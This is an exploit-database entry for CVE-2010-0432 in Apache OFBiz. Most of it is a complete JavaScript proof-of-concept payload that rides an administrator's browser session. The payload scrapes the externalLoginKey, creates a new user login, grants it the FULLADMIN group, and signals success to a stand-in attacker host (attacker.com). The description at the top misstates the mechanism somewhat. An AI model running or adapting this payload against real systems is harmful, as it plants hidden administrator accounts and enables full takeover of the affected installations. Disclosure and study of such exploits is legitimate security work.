Apache OFBiz FULLADMIN Creator PoC Payload

vendor:

OFBiz

by:

Lucas Apa

8,8

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: OFBiz

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: YES

Related CWE: CVE-2010-0432

CPE: a:apache:ofbiz

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unknown

2010

Apache OFBiz FULLADMIN Creator PoC Payload

This exploit allows an attacker to bypass authentication and create a user with full administrative privileges in Apache OFBiz. The exploit works by sending a POST request to the /webtools/control/scheduleService endpoint with the externalLoginKey parameter set to the value of the externalLoginKey cookie. The request also includes the username and password of the user to be created, as well as the roleTypeId parameter set to FULLADMIN.

Mitigation:

Upgrade to the latest version of Apache OFBiz and ensure that all users have strong passwords.

Source

Exploit-DB raw data:

/*

Apache OFBiz FULLADMIN Creator PoC Payload.

CVE: CVE-2010-0432

By: Lucas Apa ( lucas -at- bonsai-sec.com ).

Bonsai Information Security

http://www.bonsai-sec.com/

*/

var username = 'bonsaiUser';
var password = 'bonsaiPass';

var nodes = document.getElementsByClassName('fieldWidth300');
for (var i=0; i<nodes.length; i++) {
if(/script/.test(nodes[i].children[0].innerHTML)){
nodes[i].parentNode.style.display = "none";
}
}
var xmlhttp=false;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp = false;
}
}

if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp = new XMLHttpRequest();
} catch (e) {
xmlhttp=false;
}
}
if (!xmlhttp && window.createRequest) {
try {
xmlhttp = window.createRequest();
} catch (e) {
xmlhttp=false;
}
}

xmlhttp.open("GET", "/myportal/control/main",true);
xmlhttp.send(null)
xmlhttp.onreadystatechange=function() {
if (xmlhttp.readyState==4) {
var text = xmlhttp.responseText;
var regex = /externalLoginKey=(.*?)\"/;
var externalKey = text.match(regex)[1];

xmlhttp2 = false;
try {
xmlhttp2 = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp2 = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp2 = false;
}
}

if (!xmlhttp2 && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp2 = new XMLHttpRequest();
} catch (e) {
xmlhttp2=false;
}
}
if (!xmlhttp && window.createRequest) {
try {
xmlhttp2 = window.createRequest();
} catch (e) {
xmlhttp2=false;
}
}
var cookie = unescape(document.cookie);
xmlhttp2.open("POST",
"/webtools/control/scheduleService?externalLoginKey="+externalKey,true);
xmlhttp2.onreadystatechange=function() {
if (xmlhttp2.readyState==4) {
//alert(xmlhttp.responseText)
}
}
xmlhttp2.setRequestHeader("cookie", cookie);
xmlhttp2.setRequestHeader("content-type",
"application/x-www-form-urlencoded");

var
str1=(<r><![CDATA[POOL_NAME=pool&SERVICE_NAME=createUserLogin&_RUN_SYNC_=Y&currentPassword=]]></r>).toString();
var str2 = (<r><![CDATA[&currentPasswordVerify=]]></r>).toString();
var str3 =
(<r><![CDATA[&enabled=&externalAuthId=&partyId=&passwordHint=&requirePasswordChange=&userLoginId=]]></r>).toString();
var post_data = str1 + password + str2 + password + str3 + username;
xmlhttp2.send(post_data);

var xmlhttp3=false;
try {
xmlhttp3 = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp3 = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp3 = false;
}
}
if (!xmlhttp3 && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp3 = new XMLHttpRequest();
} catch (e) {
xmlhttp3=false;
}
}
if (!xmlhttp3 && window.createRequest) {
try {
xmlhttp3 = window.createRequest();
} catch (e) {
xmlhttp3=false;
}
}

xmlhttp3.open("POST",
"/webtools/control/UpdateGeneric?entityName=UserLoginSecurityGroup&externalLoginKey="+externalKey,true);
xmlhttp3.onreadystatechange=function() {
if (xmlhttp3.readyState==4) {
if(/UserLoginSecurityGroup/.test(xmlhttp3.responseText)){
var xmlhttp4=false;
try {
xmlhttp4 = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp4 = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp4 = false;
}
}
if (!xmlhttp4 && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp4 = new XMLHttpRequest();
} catch (e) {
xmlhttp4=false;
}
}
if (!xmlhttp4 && window.createRequest) {
try {
xmlhttp4 = window.createRequest();
} catch (e) {
xmlhttp4=false;
}
}
xmlhttp4.open("GET", "
http://www.attacker.com/successful-ofbiz-attack.php?done=yes",true);
xmlhttp4.send(null);
}
}
}
xmlhttp3.setRequestHeader("cookie",cookie);
xmlhttp3.setRequestHeader("content-type",
"application/x-www-form-urlencoded");

var str1 = (<r><![CDATA[UPDATE_MODE=CREATE&userLoginId=]]></r>).toString();
var str2 =
(<r><![CDATA[&groupId=FULLADMIN&fromDate=2000-02-01+1%3A38%3A44.252&thruDate=2020-02-27+1%3A38%3A49.268&lastUpdatedStamp=2010-02-11+1%3A38%3A56.724&lastUpdatedTxStamp=2010-02-04+1%3A39%3A0.260&createdStamp=2010-02-22+1%3A39%3A2.692&createdTxStamp=2010-02-28+1%3A39%3A6.548&Update=Crear]]></r>).toString();

var post_data2 = str1 + username + str2;

xmlhttp3.send(post_data2);

}
}